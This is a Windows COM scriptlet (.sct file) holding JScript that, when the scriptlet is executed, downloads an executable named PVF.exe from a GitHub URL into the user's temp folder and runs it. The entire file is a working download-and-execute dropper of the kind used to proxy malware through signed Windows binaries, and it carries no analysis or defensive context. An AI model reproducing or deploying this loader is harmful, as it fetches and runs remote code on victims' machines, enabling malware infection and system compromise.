<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
	var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/PVF";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","https://github.com/adpbot/spr/blob/6c0d6e3c8bfbd47e55b5455da35c3273127c4917/PVF.exe", false);
xhr.send();
if (xhr.Status == 200) {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1;
    stream.Write(xhr.ResponseBody);
    stream.Position = 0;
    if (fso.FileExists(filepath)) {
        try {
            fso.DeleteFile(filepath);  
        } catch(err) {}
    }
    try {
        stream.SaveToFile(filepath);
    } catch(err) {}
    stream.Close();
    new ActiveXObject("WScript.Shell").Exec(filepath);
}
    ]]>
</script>
</registration>
</scriptlet>